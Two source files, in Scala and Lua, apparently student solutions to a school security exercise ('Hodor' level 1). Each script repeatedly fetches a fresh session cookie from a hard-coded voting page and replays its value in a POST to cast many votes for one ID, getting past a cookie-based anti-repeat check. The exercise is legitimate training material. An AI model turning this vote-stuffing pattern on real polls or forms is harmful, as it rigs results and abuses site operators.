File: hodor/level_1/Scala/hodor1.scala
/*
 * ===--------------------------------------------------------------------------===
 * 		Hodor Project Level 1, by Julien Barbier.
 * 		Solution using Scala Programming language.
 *      Using Scala version "2.11.8" + scalaj.http
 *
 *		by Alexandro de Oliveira, for Holberton School.
 * ===--------------------------------------------------------------------------===
 */

import scalaj.http._ //{HttpResponse, HttpOptions}
import scala.io.StdIn.readInt // for readInt

object Hodor0 {
    def main(args: Array[String]) {
        // Get number from user:
        println("How many votes? => ")
        val total: Int = readInt()
        var count: Int = 0
        for(count <- 0 until total) {
            posting(count)
        }
    }
    def posting(n: Int): Unit = {
        val URL: String = "http://173.246.108.142/level1.php"
        // HEAD Request to fetch and parse fresh cookie:
        val head: HttpResponse[String] = Http(URL)
            .method("HEAD")
            .option(HttpOptions.readTimeout(30000)) // To avoid timeout errors.
            .asString
        // Parsing the Cookie:
        var cookie: String = head.headers("Set-Cookie")(0).split(";")(0)
        val value: String = cookie.split("=")(1)
        // POST request:
        val response: HttpResponse[String] = Http(URL)
            .postForm(Seq("id" -> "23","holdthedoor" -> "submit", "key" -> value))
            .header("Content-Type", "application/x-www-form-urlencoded")
            .header("UserAgent", "Havk64 Scala requests")
            .header("Cookie", cookie)
            .option(HttpOptions.readTimeout(30000)).asString
        // Check if vote was computes:
        if(response.headers.contains("Set-Cookie")) {
            println(s"Vote number: ${n + 1}")
        } else {
            println("Failed...")
        }
        // Optionally print the Headers and Body.
        //println(response.headers)
        //println(response.body)
    }
}

File: hodor/level_1/Lua/hodor1.lua
#!/usr/bin/env lua
--[[
 ===-----------------------------------------------------------------------===
      Hodor Project level 1, by Julien Barbier
      Using Lua programming language.

      By Alexandro de Oliveira.
 ===-----------------------------------------------------------------------===
 ]]

--  To install the http package do: $ luarocks install luasocket
local http = require "socket.http"
local ltn12 = require "ltn12"
local utils = require "utils"

local url = "http://173.246.108.142/level1.php"
local count = 0
io.write("How many votes? => ") -- Prints the message requesting total votes.
local total = io.read("*n")     -- Reading a number from user.
while count < total do
    -- HEAD request to get a cookie and use it in the POST request.
    local _, _, header = http.request {
        method = "HEAD",
        url = url,
        headers =
                {
                        ['User-Agent'] = "Havk64 Lua Requests"
                }
    }
    local hc = header['set-cookie']
    local tcookie = utils.parse(hc)
    local cookie = tcookie['cookie']
    local value = tcookie['value']
    -- Print the Header of HEAD request:
    -- print (p(headers))

    -- Preparing the POST request:
    local reqbody = "id=23&holdthedoor=submit&key=" .. value
    local respbody = {}
    local _, _, headers = http.request {
        method = "POST",
        url = url,
        source = ltn12.source.string(reqbody),
        headers =
                {
                        ["Accept"] = "*/*",
                        ["Accept-Encoding"] = "gzip, deflate",
                        ["Accept-Language"] = "en-us",
                        ['User-Agent'] = "Havk64 Lua Script Requests",
                        --['Connection'] = "keep-alive",
                        ["Cookie"] = cookie,
                        ["Content-Type"] = "application/x-www-form-urlencoded",
                        ["content-length"] = string.len(reqbody)
                    },

                    sink = ltn12.sink.table(respbody)

        }
        -- Checking the response header:
        -- print (p(headers))
        local test = headers['set-cookie']
        if test ~= nil then
            print("Vote number: " .. (count + 1))
            count = count + 1
        else
            print("Failed")
        end
end
